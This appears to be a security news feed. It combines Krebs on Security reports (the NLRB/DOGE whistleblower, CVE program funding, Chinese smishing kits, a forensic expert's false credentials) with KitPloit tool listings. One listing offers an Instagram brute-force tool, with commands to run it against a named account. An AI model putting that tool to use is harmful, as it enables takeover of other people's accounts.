A security architect with the National Labor Relations Board (NLRB) alleges that employees from Elon Musk‘s Department of Government Efficiency (DOGE) transferred gigabytes of sensitive data from agency case files in early March, using short-lived accounts configured to leave few traces of network activity. The NLRB whistleblower said the unusual large data outflows coincided with multiple blocked login attempts from an Internet address in Russia that tried to use valid credentials for a newly-created DOGE user account.

The cover letter from Berulis’s whistleblower statement, sent to the leaders of the Senate Select Committee on Intelligence.

The allegations came in an April 14 letter to the Senate Select Committee on Intelligence, signed by Daniel J. Berulis, a 38-year-old security architect at the NLRB.

NPR, which was the first to report on Berulis’s whistleblower complaint, says NLRB is a small, independent federal agency that investigates and adjudicates complaints about unfair labor practices, and stores “reams of potentially sensitive data, from confidential information about employees who want to form unions to proprietary business information.”

The complaint documents a one-month period beginning March 3, during which DOGE officials reportedly demanded the creation of all-powerful “tenant admin” accounts in NLRB systems that were to be exempted from network logging activity that would otherwise keep a detailed record of all actions taken by those accounts.

Berulis said the new DOGE accounts had unrestricted permission to read, copy, and alter information contained in NLRB databases. The new accounts also could restrict log visibility, delay retention, route logs elsewhere, or even remove them entirely — top-tier user privileges that neither Berulis nor his boss possessed.

Berulis writes that on March 3, a black SUV accompanied by a police escort arrived at his building — the NLRB headquarters in Southeast Washington, D.C. The DOGE staffers did not speak with Berulis or anyone else in NLRB’s IT staff, but instead met with the agency leadership.

“Our acting chief information officer told us not to adhere to standard operating procedure with the DOGE account creation, and there was to be no logs or records made of the accounts created for DOGE employees, who required the highest level of access,” Berulis wrote of their instructions after that meeting.

“We have built in roles that auditors can use and have used extensively in the past but would not give the ability to make changes or access subsystems without approval,” he continued. “The suggestion that they use these accounts was not open to discussion.”

Berulis found that on March 3 one of the DOGE accounts created an opaque, virtual environment known as a “container,” which can be used to build and run programs or scripts without revealing its activities to the rest of the world. Berulis said the container caught his attention because he polled his colleagues and found none of them had ever used containers within the NLRB network.

Berulis said he also noticed that early the next morning — between approximately 3 a.m. and 4 a.m. EST on Tuesday, March 4  — there was a large increase in outgoing traffic from the agency. He said it took several days of investigating with his colleagues to determine that one of the new accounts had transferred approximately 10 gigabytes worth of data from the NLRB’s NxGen case management system.

Berulis said neither he nor his co-workers had the necessary network access rights to review which files were touched or transferred — or even where they went. But his complaint notes the NxGen database contains sensitive information on unions, ongoing legal cases, and corporate secrets.

“I also don’t know if the data was only 10gb in total or whether or not they were consolidated and compressed prior,” Berulis told the senators. “This opens up the possibility that even more data was exfiltrated. Regardless, that kind of spike is extremely unusual because data almost never directly leaves NLRB’s databases.”

Berulis said he and his colleagues grew even more alarmed when they noticed nearly two dozen login attempts from a Russian Internet address (83.149.30,186) that presented valid login credentials for a DOGE employee account — one that had been created just minutes earlier. Berulis said those attempts were all blocked thanks to rules in place that prohibit logins from non-U.S. locations.

“Whoever was attempting to log in was using one of the newly created accounts that were used in the other DOGE related activities and it appeared they had the correct username and password due to the authentication flow only stopping them due to our no-out-of-country logins policy activating,” Berulis wrote. “There were more than 20 such attempts, and what is particularly concerning is that many of these login attempts occurred within 15 minutes of the accounts being created by DOGE engineers.”

According to Berulis, the naming structure of one Microsoft user account connected to the suspicious activity suggested it had been created and later deleted for DOGE use in the NLRB’s cloud systems: “DogeSA_2d5c3e0446f9@nlrb.microsoft.com.” He also found other new Microsoft cloud administrator accounts with nonstandard usernames, including “Whitesox, Chicago M.” and “Dancehall, Jamaica R.”

A screenshot shared by Berulis showing the suspicious user accounts.

On March 5, Berulis documented that a large section of logs for recently created network resources were missing, and a network watcher in Microsoft Azure was set to the “off” state, meaning it was no longer collecting and recording data like it should have.

Berulis said he discovered someone had downloaded three external code libraries from GitHub that neither NLRB nor its contractors ever use. A “readme” file in one of the code bundles explained it was created to rotate connections through a large pool of cloud Internet addresses that serve “as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.” Brute force attacks involve automated login attempts that try many credential combinations in rapid sequence.

The complaint alleges that by March 17 it became clear the NLRB no longer had the resources or network access needed to fully investigate the odd activity from the DOGE accounts, and that on March 24, the agency’s associate chief information officer had agreed the matter should be reported to US-CERT. Operated by the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA), US-CERT provides on-site cyber incident response capabilities to federal and state agencies.

But Berulis said that between April 3 and 4, he and the associate CIO were informed that “instructions had come down to drop the US-CERT reporting and investigation and we were directed not to move forward or create an official report.” Berulis said it was at this point he decided to go public with his findings.

An email from Daniel Berulis to his colleagues dated March 28, referencing the unexplained traffic spike earlier in the month and the unauthorized changing of security controls for user accounts.

Tim Bearese, the NLRB’s acting press secretary, told NPR that DOGE neither requested nor received access to its systems, and that “the agency conducted an investigation after Berulis raised his concerns but ‘determined that no breach of agency systems occurred.'” The NLRB did not respond to questions from KrebsOnSecurity.

Nevertheless, Berulis has shared a number of supporting screenshots showing agency email discussions about the unexplained account activity attributed to the DOGE accounts, as well as NLRB security alerts from Microsoft about network anomalies observed during the timeframes described.

As CNN reported last month, the NLRB has been effectively hobbled since President Trump fired three board members, leaving the agency without the quorum it needs to function.

“Despite its limitations, the agency had become a thorn in the side of some of the richest and most powerful people in the nation — notably Elon Musk, Trump’s key supporter both financially and arguably politically,” CNN wrote.

Both Amazon and Musk’s SpaceX have been suing the NLRB over complaints the agency filed in disputes about workers’ rights and union organizing, arguing that the NLRB’s very existence is unconstitutional. On March 5, a U.S. appeals court unanimously rejected Musk’s claim that the NLRB’s structure somehow violates the Constitution.

Berulis shared screenshots with KrebsOnSecurity showing that on the day the NPR published its story about his claims (April 14), the deputy CIO at NLRB sent an email stating that administrative control had been removed from all employee accounts. Meaning, suddenly none of the IT employees at the agency could do their jobs properly anymore, Berulis said.

An email from the NLRB’s associate chief information officer Eric Marks, notifying employees they will lose security administrator privileges.

Berulis shared a screenshot of an agency-wide email dated April 16 from NLRB director Lasharn Hamilton saying DOGE officials had requested a meeting, and reiterating claims that the agency had no prior “official” contact with any DOGE personnel. The message informed NLRB employees that two DOGE representatives would be detailed to the agency part-time for several months.

An email from the NLRB Director Lasharn Hamilton on April 16, stating that the agency previously had no contact with DOGE personnel.

Berulis told KrebsOnSecurity he was in the process of filing a support ticket with Microsoft to request more information about the DOGE accounts when his network administrator access was restricted. Now, he’s hoping lawmakers will ask Microsoft to provide more information about what really happened with the accounts.

“That would give us way more insight,” he said. “Microsoft has to be able to see the picture better than we can. That’s my goal, anyway.”

Berulis’s attorney told lawmakers that on April 7, while his client and legal team were preparing the whistleblower complaint, someone physically taped a threatening note to Mr. Berulis’s home door with photographs — taken via drone — of him walking in his neighborhood.

“The threatening note made clear reference to this very disclosure he was preparing for you, as the proper oversight authority,” reads a preface by Berulis’s attorney Andrew P. Bakaj. “While we do not know specifically who did this, we can only speculate that it involved someone with the ability to access NLRB systems.”

Berulis said the response from friends, colleagues and even the public has been largely supportive, and that he doesn’t regret his decision to come forward.

“I didn’t expect the letter on my door or the pushback from [agency] leaders,” he said. “If I had to do it over, would I do it again? Yes, because it wasn’t really even a choice the first time.”

For now, Mr. Berulis is taking some paid family leave from the NLRB. Which is just as well, he said, considering he was stripped of the tools needed to do his job at the agency.

“They came in and took full administrative control and locked everyone out, and said limited permission will be assigned on a need basis going forward” Berulis said of the DOGE employees. “We can’t really do anything, so we’re literally getting paid to count ceiling tiles.”

Further reading: Berulis’s complaint (PDF).

☐ ☆ ✇ KitPloit - PenTest Tools!

TruffleHog Explorer - A User-Friendly Web-Based Tool To Visualize And Analyze Data Extracted Using TruffleHog

By: Unknown — April 18th 2025 at 12:30


Welcome to TruffleHog Explorer, a user-friendly web-based tool to visualize and analyze data extracted using TruffleHog. TruffleHog is one of the most powerful secrets discovery, classification, validation, and analysis open source tool. In this context, a secret refers to a credential a machine uses to authenticate itself to another machine. This includes API keys, database passwords, private encryption keys, and more.

With an improved UI/UX, powerful filtering options, and export capabilities, this tool helps security professionals efficiently review potential secrets and credentials found in their repositories.

⚠️ This dashboard has been tested only with GitHub TruffleHog JSON outputs. Expect updates soon to support additional formats and platforms.

You can use online version here: TruffleHog Explorer


🚀 Features

  • Intuitive UI/UX: Beautiful pastel theme with smooth navigation.
  • Powerful Filtering:
  • Filter findings by repository, detector type, and uploaded file.
  • Flexible date range selection with a calendar picker.
  • Verification status categorization for effective review.
  • Advanced search capabilities for faster identification.
  • Batch Operations:
  • Verify or reject multiple findings with a single click.
  • Toggle visibility of rejected results for a streamlined view.
  • Bulk processing to manage large datasets efficiently.
  • Export Capabilities:
  • Export verified secrets or filtered findings effortlessly.
  • Save and load session backups for continuity.
  • Generate reports in multiple formats (JSON, CSV).
  • Dynamic Sorting:
  • Sort results by repository, date, or verification status.
  • Customizable sorting preferences for a personalized experience.

📥 Installation & Usage

1. Clone the Repository

$ git clone https://github.com/yourusername/trufflehog-explorer.git
$ cd trufflehog-explorer

2. Open the index.html

Simply open the index.html file in your preferred web browser.

$ open index.html

📂 How to Use

  1. Upload TruffleHog JSON Findings:
  2. Click on the "Load Data" section and select your .json files from TruffleHog output.
  3. Multiple files are supported.
  4. Apply Filters:
  5. Choose filters such as repository, detector type, and verification status.
  6. Utilize the date range picker to narrow down findings.
  7. Leverage the search function to locate specific findings quickly.
  8. Review Findings:
  9. Click on a finding to expand and view its details.
  10. Use the action buttons to verify or reject findings.
  11. Add comments and annotations for better tracking.
  12. Export Results:
  13. Export verified or filtered findings for reporting.
  14. Save session data for future review and analysis.
  15. Save Your Progress:
  16. Save your session and resume later without losing any progress.
  17. Automatic backup feature to prevent data loss.

Happy Securing! 🔒



☐ ☆ ✇ Security – Cisco Blog

The Need for a Strong CVE Program

By: Omar Santos — April 16th 2025 at 17:53
The CVE program is the foundation for standardized vulnerability disclosure and management. With its future uncertain, global organizations face challenges.
☐ ☆ ✇ KitPloit - PenTest Tools!

Wappalyzer-Next - Python library that uses Wappalyzer extension (and its fingerprints) to detect technologies

By: Unknown — April 16th 2025 at 12:30


This project is a command line tool and python library that uses Wappalyzer extension (and its fingerprints) to detect technologies. Other projects emerged after discontinuation of the official open source project are using outdated fingerpints and lack accuracy when used on dynamic web-apps, this project bypasses those limitations.


Installation

Before installing wappalyzer, you will to install Firefox and geckodriver/releases">geckodriver. Below are detailed steps for setting up geckodriver but you may use google/youtube for help.

Setting up geckodriver

Step 1: Download GeckoDriver

  1. Visit the official GeckoDriver releases page on GitHub:
    https://github.com/mozilla/geckodriver/releases
  2. Download the version compatible with your system:
  3. For Windows: geckodriver-vX.XX.X-win64.zip
  4. For macOS: geckodriver-vX.XX.X-macos.tar.gz
  5. For Linux: geckodriver-vX.XX.X-linux64.tar.gz
  6. Extract the downloaded file to a folder of your choice.

Step 2: Add GeckoDriver to the System Path

To ensure Selenium can locate the GeckoDriver executable: - Windows: 1. Move the geckodriver.exe to a directory (e.g., C:\WebDrivers\). 2. Add this directory to the system's PATH: - Open Environment Variables. - Under System Variables, find and select the Path variable, then click Edit. - Click New and enter the directory path where geckodriver.exe is stored. - Click OK to save. - macOS/Linux: 1. Move the geckodriver file to /usr/local/bin/ or another directory in your PATH. 2. Use the following command in the terminal: bash sudo mv geckodriver /usr/local/bin/ Ensure /usr/local/bin/ is in your PATH.

Install as a command-line tool

pipx install wappalyzer

Install as a library

To use it as a library, install it with pip inside an isolated container e.g. venv or docker. You may also --break-system-packages to do a 'regular' install but it is not recommended.

Install with docker

Steps

  1. Clone the repository:
git clone https://github.com/s0md3v/wappalyzer-next.git
cd wappalyzer-next
  1. Build and run with Docker Compose:
docker compose up -d
  1. To scan URLs using the Docker container:

  2. Scan a single URL:

docker compose run --rm wappalyzer -i https://example.com
  • Scan Multiple URLs from a file:
docker compose run --rm wappalyzer -i https://example.com -oJ output.json

For Users

Some common usage examples are given below, refer to list of all options for more information.

  • Scan a single URL: wappalyzer -i https://example.com
  • Scan multiple URLs from a file: wappalyzer -i urls.txt -t 10
  • Scan with authentication: wappalyzer -i https://example.com -c "sessionid=abc123; token=xyz789"
  • Export results to JSON: wappalyzer -i https://example.com -oJ results.json

Options

Note: For accuracy use 'full' scan type (default). 'fast' and 'balanced' do not use browser emulation.

  • -i: Input URL or file containing URLs (one per line)
  • --scan-type: Scan type (default: 'full')
  • fast: Quick HTTP-based scan (sends 1 request)
  • balanced: HTTP-based scan with more requests
  • full: Complete scan using wappalyzer extension
  • -t, --threads: Number of concurrent threads (default: 5)
  • -oJ: JSON output file path
  • -oC: CSV output file path
  • -oH: HTML output file path
  • -c, --cookie: Cookie header string for authenticated scans

For Developers

The python library is a available on pypi as wappalyzer and can be imported with the same name.

Using the Library

The main function you'll interact with is analyze():

from wappalyzer import analyze

# Basic usage
results = analyze('https://example.com')

# With options
results = analyze(
url='https://example.com',
scan_type='full', # 'fast', 'balanced', or 'full'
threads=3,
cookie='sessionid=abc123'
)

analyze() Function Parameters

  • url (str): The URL to analyze
  • scan_type (str, optional): Type of scan to perform
  • 'fast': Quick HTTP-based scan
  • 'balanced': HTTP-based scan with more requests
  • 'full': Complete scan including JavaScript execution (default)
  • threads (int, optional): Number of threads for parallel processing (default: 3)
  • cookie (str, optional): Cookie header string for authenticated scans

Return Value

Returns a dictionary with the URL as key and detected technologies as value:

{
"https://github.com": {
"Amazon S3": {"version": "", "confidence": 100, "categories": ["CDN"], "groups": ["Servers"]},
"lit-html": {"version": "1.1.2", "confidence": 100, "categories": ["JavaScript libraries"], "groups": ["Web development"]},
"React Router": {"version": "6", "confidence": 100, "categories": ["JavaScript frameworks"], "groups": ["Web development"]},
"https://google.com" : {},
"https://example.com" : {},
}}

FAQ

Why use Firefox instead of Chrome?

Firefox extensions are .xpi files which are essentially zip files. This makes it easier to extract data and slightly modify the extension to make this tool work.

What is the difference between 'fast', 'balanced', and 'full' scan types?

  • fast: Sends a single HTTP request to the URL. Doesn't use the extension.
  • balanced: Sends additional HTTP requests to .js files, /robots.txt annd does DNS queries. Doesn't use the extension.
  • full: Uses the official Wappalyzer extension to scan the URL in a headless browser.


☐ ☆ ✇ Krebs on Security

Funding Expires for Key Cyber Vulnerability Database

By: BrianKrebs — April 16th 2025 at 03:59

A critical resource that cybersecurity professionals worldwide rely on to identify, mitigate and fix security vulnerabilities in software and hardware is in danger of breaking down. The federally funded, non-profit research and development organization MITRE warned today that its contract to maintain the Common Vulnerabilities and Exposures (CVE) program — which is traditionally funded each year by the Department of Homeland Security — expires on April 16.

A letter from MITRE vice president Yosry Barsoum, warning that the funding for the CVE program will expire on April 16, 2025.

Tens of thousands of security flaws in software are found and reported every year, and these vulnerabilities are eventually assigned their own unique CVE tracking number (e.g. CVE-2024-43573, which is a Microsoft Windows bug that Redmond patched last year).

There are hundreds of organizations — known as CVE Numbering Authorities (CNAs) — that are authorized by MITRE to bestow these CVE numbers on newly reported flaws. Many of these CNAs are country and government-specific, or tied to individual software vendors or vulnerability disclosure platforms (a.k.a. bug bounty programs).

Put simply, MITRE is a critical, widely-used resource for centralizing and standardizing information on software vulnerabilities. That means the pipeline of information it supplies is plugged into an array of cybersecurity tools and services that help organizations identify and patch security holes — ideally before malware or malcontents can wriggle through them.

“What the CVE lists really provide is a standardized way to describe the severity of that defect, and a centralized repository listing which versions of which products are defective and need to be updated,” said Matt Tait, chief operating officer of Corellium, a cybersecurity firm that sells phone-virtualization software for finding security flaws.

In a letter sent today to the CVE board, MITRE Vice President Yosry Barsoum warned that on April 16, 2025, “the current contracting pathway for MITRE to develop, operate and modernize CVE and several other related programs will expire.”

“If a break in service were to occur, we anticipate multiple impacts to CVE, including deterioration of national vulnerability databases and advisories, tool vendors, incident response operations, and all manner of critical infrastructure,” Barsoum wrote.

MITRE told KrebsOnSecurity the CVE website listing vulnerabilities will remain up after the funding expires, but that new CVEs won’t be added after April 16.

A representation of how a vulnerability becomes a CVE, and how that information is consumed. Image: James Berthoty, Latio Tech, via LinkedIn.

DHS officials did not immediately respond to a request for comment. The program is funded through DHS’s Cybersecurity & Infrastructure Security Agency (CISA), which is currently facing deep budget and staffing cuts by the Trump administration. The CVE contract available at USAspending.gov says the project was awarded approximately $40 million last year.

Former CISA Director Jen Easterly said the CVE program is a bit like the Dewey Decimal System, but for cybersecurity.

“It’s the global catalog that helps everyone—security teams, software vendors, researchers, governments—organize and talk about vulnerabilities using the same reference system,” Easterly said in a post on LinkedIn. “Without it, everyone is using a different catalog or no catalog at all, no one knows if they’re talking about the same problem, defenders waste precious time figuring out what’s wrong, and worst of all, threat actors take advantage of the confusion.”

John Hammond, principal security researcher at the managed security firm Huntress, told Reuters he swore out loud when he heard the news that CVE’s funding was in jeopardy, and that losing the CVE program would be like losing “the language and lingo we used to address problems in cybersecurity.”

“I really can’t help but think this is just going to hurt,” said Hammond, who posted a Youtube video to vent about the situation and alert others.

Several people close to the matter told KrebsOnSecurity this is not the first time the CVE program’s budget has been left in funding limbo until the last minute. Barsoum’s letter, which was apparently leaked, sounded a hopeful note, saying the government is making “considerable efforts to continue MITRE’s role in support of the program.”

Tait said that without the CVE program, risk managers inside companies would need to continuously monitor many other places for information about new vulnerabilities that may jeopardize the security of their IT networks. Meaning, it may become more common that software updates get mis-prioritized, with companies having hackable software deployed for longer than they otherwise would, he said.

“Hopefully they will resolve this, but otherwise the list will rapidly fall out of date and stop being useful,” he said.

Update, April 16, 11:00 a.m. ET: The CVE board today announced the creation of non-profit entity called The CVE Foundation that will continue the program’s work under a new, unspecified funding mechanism and organizational structure.

“Since its inception, the CVE Program has operated as a U.S. government-funded initiative, with oversight and management provided under contract,” the press release reads. “While this structure has supported the program’s growth, it has also raised longstanding concerns among members of the CVE Board about the sustainability and neutrality of a globally relied-upon resource being tied to a single government sponsor.”

The organization’s website, thecvefoundation.org, is less than a day old and currently hosts no content other than the press release heralding its creation. The announcement said the foundation would release more information about its structure and transition planning in the coming days.

Update, April 16, 4:26 p.m. ET: MITRE issued a statement today saying it “identified incremental funding to keep the programs operational. We appreciate the overwhelming support for these programs that have been expressed by the global cyber community, industry and government over the last 24 hours. The government continues to make considerable efforts to support MITRE’s role in the program and MITRE remains committed to CVE and CWE as global resources.”

☐ ☆ ✇ Security – Cisco Blog

From Deployment to Visibility: Cisco Secure Client’s Cloud Transformation

By: Paul Carco — April 15th 2025 at 12:00
Cisco Secure Client can now be deployed and managed via Client Management in Cisco XDR.
☐ ☆ ✇ Security – Cisco Blog

Sign Up for a Tour at the SOC at RSAC™ 2025 Conference

By: Jessica (Bair) Oppenheimer — April 14th 2025 at 12:00
Cisco and Endace provide Security Operations Center services at RSAC™ 2025 Conference. Sign up for a tour and see what happens in the SOC.
☐ ☆ ✇ KitPloit - PenTest Tools!

Instagram-Brute-Force-2024 - Instagram Brute Force 2024 Compatible With Python 3.13 / X64 Bit / Only Chrome Browser

By: Unknown — April 13th 2025 at 12:30


Instagram Brute Force CPU/GPU Supported 2024

(Use option 2 while running the script.)

(Option 1 is on development)

(Chrome should be downloaded in device.)

Compatible and Tested (GUI Supported Operating Systems Only)

Python 3.13 x64 bit Unix / Linux / Mac / Windows 8.1 and higher


Install Requirements

pip install -r requirements.txt

How to run

python3 instagram_brute_force.py [instagram_username_without_hashtag]
python3 instagram_brute_force.py mrx161


☐ ☆ ✇ WIRED

Homeland Security Email Tells a US Citizen to ‘Immediately’ Self-Deport

By: Andrew Couts — April 13th 2025 at 01:35
An email sent by the Department of Homeland Security instructs people in the US on a temporary legal status to leave the country. But who the email actually applies to—and who actually received it—is far from clear.
☐ ☆ ✇ Krebs on Security

China-based SMS Phishing Triad Pivots to Banks

By: BrianKrebs — April 10th 2025 at 15:31

China-based purveyors of SMS phishing kits are enjoying remarkable success converting phished payment card data into mobile wallets from Apple and Google. Until recently, the so-called “Smishing Triad” mainly impersonated toll road operators and shipping companies. But experts say these groups are now directly targeting customers of international financial institutions, while dramatically expanding their cybercrime infrastructure and support staff.

An image of an iPhone device farm shared on Telegram by one of the Smishing Triad members. Image: Prodaft.

If you own a mobile device, the chances are excellent that at some point in the past two years you’ve received at least one instant message that warns of a delinquent toll road fee, or a wayward package from the U.S. Postal Service (USPS). Those who click the promoted link are brought to a website that spoofs the USPS or a local toll road operator and asks for payment card information.

The site will then complain that the visitor’s bank needs to “verify” the transaction by sending a one-time code via SMS. In reality, the bank is sending that code to the mobile number on file for their customer because the fraudsters have just attempted to enroll that victim’s card details into a mobile wallet.

If the visitor supplies that one-time code, their payment card is then added to a new mobile wallet on an Apple or Google device that is physically controlled by the phishers. The phishing gangs typically load multiple stolen cards to digital wallets on a single Apple or Android device, and then sell those phones in bulk to scammers who use them for fraudulent e-commerce and tap-to-pay transactions.

A screenshot of the administrative panel for a smishing kit. On the left is the (test) data entered at the phishing site. On the right we can see the phishing kit has superimposed the supplied card number onto an image of a payment card. When the phishing kit scans that created card image into Apple or Google Pay, it triggers the victim’s bank to send a one-time code. Image: Ford Merrill.

The moniker “Smishing Triad” comes from Resecurity, which was among the first to report in August 2023 on the emergence of three distinct mobile phishing groups based in China that appeared to share some infrastructure and innovative phishing techniques. But it is a bit of a misnomer because the phishing lures blasted out by these groups are not SMS or text messages in the conventional sense.

Rather, they are sent via iMessage to Apple device users, and via RCS on Google Android devices. Thus, the missives bypass the mobile phone networks entirely and enjoy near 100 percent delivery rate (at least until Apple and Google suspend the spammy accounts).

In a report published on March 24, the Swiss threat intelligence firm Prodaft detailed the rapid pace of innovation coming from the Smishing Triad, which it characterizes as a loosely federated group of Chinese phishing-as-a-service operators with names like Darcula, Lighthouse, and the Xinxin Group.

Prodaft said they’re seeing a significant shift in the underground economy, particularly among Chinese-speaking threat actors who have historically operated in the shadows compared to their Russian-speaking counterparts.

“Chinese-speaking actors are introducing innovative and cost-effective systems, enabling them to target larger user bases with sophisticated services,” Prodaft wrote. “Their approach marks a new era in underground business practices, emphasizing scalability and efficiency in cybercriminal operations.”

A new report from researchers at the security firm SilentPush finds the Smishing Triad members have expanded into selling mobile phishing kits targeting customers of global financial institutions like CitiGroup, MasterCard, PayPal, Stripe, and Visa, as well as banks in Canada, Latin America, Australia and the broader Asia-Pacific region.

Phishing lures from the Smishing Triad spoofing PayPal. Image: SilentPush.

SilentPush found the Smishing Triad now spoofs recognizable brands in a variety of industry verticals across at least 121 countries and a vast number of industries, including the postal, logistics, telecommunications, transportation, finance, retail and public sectors.

According to SilentPush, the domains used by the Smishing Triad are rotated frequently, with approximately 25,000 phishing domains active during any 8-day period and a majority of them sitting at two Chinese hosting companies: Tencent (AS132203) and Alibaba (AS45102).

“With nearly two-thirds of all countries in the world targeted by [the] Smishing Triad, it’s safe to say they are essentially targeting every country with modern infrastructure outside of Iran, North Korea, and Russia,” SilentPush wrote. “Our team has observed some potential targeting in Russia (such as domains that mentioned their country codes), but nothing definitive enough to indicate Russia is a persistent target. Interestingly, even though these are Chinese threat actors, we have seen instances of targeting aimed at Macau and Hong Kong, both special administrative regions of China.”

SilentPush’s Zach Edwards said his team found a vulnerability that exposed data from one of the Smishing Triad’s phishing pages, which revealed the number of visits each site received each day across thousands of phishing domains that were active at the time. Based on that data, SilentPush estimates those phishing pages received well more than a million visits within a 20-day time span.

The report notes the Smishing Triad boasts it has “300+ front desk staff worldwide” involved in one of their more popular phishing kits — Lighthouse — staff that is mainly used to support various aspects of the group’s fraud and cash-out schemes.

The Smishing Triad members maintain their own Chinese-language sales channels on Telegram, which frequently offer videos and photos of their staff hard at work. Some of those images include massive walls of phones used to send phishing messages, with human operators seated directly in front of them ready to receive any time-sensitive one-time codes.

As noted in February’s story How Phished Data Turns Into Apple and Google Wallets, one of those cash-out schemes involves an Android app called Z-NFC, which can relay a valid NFC transaction from one of these compromised digital wallets to anywhere in the world. For a $500 month subscription, the customer can wave their phone at any payment terminal that accepts Apple or Google pay, and the app will relay an NFC transaction over the Internet from a stolen wallet on a phone in China.

Chinese nationals were recently busted trying to use these NFC apps to buy high-end electronics in Singapore. And in the United States, authorities in California and Tennessee arrested Chinese nationals accused of using NFC apps to fraudulently purchase gift cards from retailers.

The Prodaft researchers said they were able to find a previously undocumented backend management panel for Lucid, a smishing-as-a-service operation tied to the XinXin Group. The panel included victim figures that suggest the smishing campaigns maintain an average success rate of approximately five percent, with some domains receiving over 500 visits per week.

“In one observed instance, a single phishing website captured 30 credit card records from 550 victim interactions over a 7-day period,” Prodaft wrote.

Prodaft’s report details how the Smishing Triad has achieved such success in sending their spam messages. For example, one phishing vendor appears to send out messages using dozens of Android device emulators running in parallel on a single machine.

Phishers using multiple virtualized Android devices to orchestrate and distribute RCS-based scam campaigns. Image: Prodaft.

According to Prodaft, the threat actors first acquire phone numbers through various means including data breaches, open-source intelligence, or purchased lists from underground markets. They then exploit technical gaps in sender ID validation within both messaging platforms.

“For iMessage, this involves creating temporary Apple IDs with impersonated display names, while RCS exploitation leverages carrier implementation inconsistencies in sender verification,” Prodaft wrote. “Message delivery occurs through automated platforms using VoIP numbers or compromised credentials, often deployed in precisely timed multi-wave campaigns to maximize effectiveness.

In addition, the phishing links embedded in these messages use time-limited single-use URLs that expire or redirect based on device fingerprinting to evade security analysis, they found.

“The economics strongly favor the attackers, as neither RCS nor iMessage messages incur per-message costs like traditional SMS, enabling high-volume campaigns at minimal operational expense,” Prodaft continued. “The overlap in templates, target pools, and tactics among these platforms underscores a unified threat landscape, with Chinese-speaking actors driving innovation in the underground economy. Their ability to scale operations globally and evasion techniques pose significant challenges to cybersecurity defenses.”

Ford Merrill works in security research at SecAlliance, a CSIS Security Group company. Merrill said he’s observed at least one video of a Windows binary that wraps a Chrome executable and can be used to load in target phone numbers and blast messages via RCS, iMessage, Amazon, Instagram, Facebook, and WhatsApp.

“The evidence we’ve observed suggests the ability for a single device to send approximately 100 messages per second,” Merrill said. “We also believe that there is capability to source country specific SIM cards in volume that allow them to register different online accounts that require validation with specific country codes, and even make those SIM cards available to the physical devices long-term so that services that rely on checks of the validity of the phone number or SIM card presence on a mobile network are thwarted.”

Experts say this fast-growing wave of card fraud persists because far too many financial institutions still default to sending one-time codes via SMS for validating card enrollment in mobile wallets from Apple or Google. KrebsOnSecurity interviewed multiple security executives at non-U.S. financial institutions who spoke on condition of anonymity because they were not authorized to speak to the press. Those banks have since done away with SMS-based one-time codes and are now requiring customers to log in to the bank’s mobile app before they can link their card to a digital wallet.

☐ ☆ ✇ Krebs on Security

Cyber Forensic Expert in 2,000+ Cases Faces FBI Probe

By: BrianKrebs — April 4th 2025 at 16:37

A Minnesota cybersecurity and computer forensics expert whose testimony has featured in thousands of courtroom trials over the past 30 years is facing questions about his credentials and an inquiry from the Federal Bureau of Investigation (FBI). Legal experts say the inquiry could be grounds to reopen a number of adjudicated cases in which the expert’s testimony may have been pivotal.

One might conclude from reading Mr. Lanterman’s LinkedIn profile that has a degree from Harvard University.

Mark Lanterman is a former investigator for the U.S. Secret Service Electronics Crimes Task Force who founded the Minneapolis consulting firm Computer Forensic Services (CFS). The CFS website says Lanterman’s 30-year career has seen him testify as an expert in more than 2,000 cases, with experience in cases involving sexual harassment and workplace claims, theft of intellectual property and trade secrets, white-collar crime, and class action lawsuits.

Or at least it did until last month, when Lanterman’s profile and work history were quietly removed from the CFS website. The removal came after Hennepin County Attorney’s Office said it was notifying parties to ten pending cases that they were unable to verify Lanterman’s educational and employment background. The county attorney also said the FBI is now investigating the allegations.

Those allegations were raised by Sean Harrington, an attorney and forensics examiner based in Prescott, Wisconsin. Harrington alleged that Lanterman lied under oath in court on multiple occasions when he testified that he has a Bachelor of Science and a Master’s degree in computer science from the now-defunct Upsala College, and that he completed his postgraduate work in cybersecurity at Harvard University.

Harrington’s claims gained steam thanks to digging by the law firm Perkins Coie LLP, which is defending a case wherein a client’s laptop was forensically reviewed by Lanterman. On March 14, Perkins Coie attorneys asked the judge (PDF) to strike Lanterman’s testimony because neither he nor they could substantiate claims about his educational background.

Upsala College, located in East Orange, N.J., operated for 102 years until it closed in 1995 after a period of declining enrollment and financial difficulties. Perkins Coie told the court that they’d visited Felician University, which holds the transcripts for Upsala College during the years Lanterman claimed to have earned undergraduate and graduate degrees. The law firm said Felician had no record of transcripts for Lanterman (PDF), and that his name was absent from all of the Upsala College student yearbooks and commencement programs during that period.

Reached for comment, Lanterman acknowledged he had no way to prove he attended Upsala College, and that his “postgraduate work” at Harvard was in fact an eight-week online cybersecurity class called HarvardX, which cautions that its certificates should not be considered equivalent to a Harvard degree or a certificate earned through traditional, in-person programs at Harvard University.

Lanterman has testified that his first job after college was serving as a police officer in Springfield Township, Pennsylvania, although the Perkins Coie attorneys noted that this role was omitted from his resume. The attorneys said when they tried to verify Lanterman’s work history, “the police department responded with a story that would be almost impossible to believe if it was not corroborated by Lanterman’s own email communications.”

As recounted in the March 14 filing, Lanterman was deposed on Feb. 11, and the following day he emailed the Springfield Township Police Department to see if he could have a peek at his old personnel file. On Feb. 14, Lanterman visited the Springfield Township PD and asked to borrow his employment record. He told the officer he spoke with on the phone that he’d recently been instructed to “get his affairs in order” after being diagnosed with a grave heart condition, and that he wanted his old file to show his family about his early career.

According to Perkins Coie, Lanterman left the Springfield Township PD with his personnel file, and has not returned it as promised.

“It is shocking that an expert from Minnesota would travel to suburban Philadelphia and abscond with his decades-old personnel file to obscure his background,” the law firm wrote. “That appears to be the worst and most egregious form of spoliation, and the deception alone is reason enough to exclude Lanterman and consider sanctions.”

Harrington initially contacted KrebsOnSecurity about his concerns in late 2023, fuming after sitting through a conference speech in which Lanterman shared documents from a ransomware victim and told attendees it was because they’d refused to hire his company to perform a forensic investigation on a recent breach.

“He claims he was involved in the Martha Stewart investigation, the Bernie Madoff trial, Paul McCartney’s divorce, the Tom Petters investigation, the Denny Hecker investigation, and many others,” Harrington said. “He claims to have been invited to speak to the Supreme Court, claims to train the ‘entire federal judiciary’ on cybersecurity annually, and is a faculty member of the United States Judicial Conference and the Judicial College — positions which he obtained, in part, on a house of fraudulent cards.”

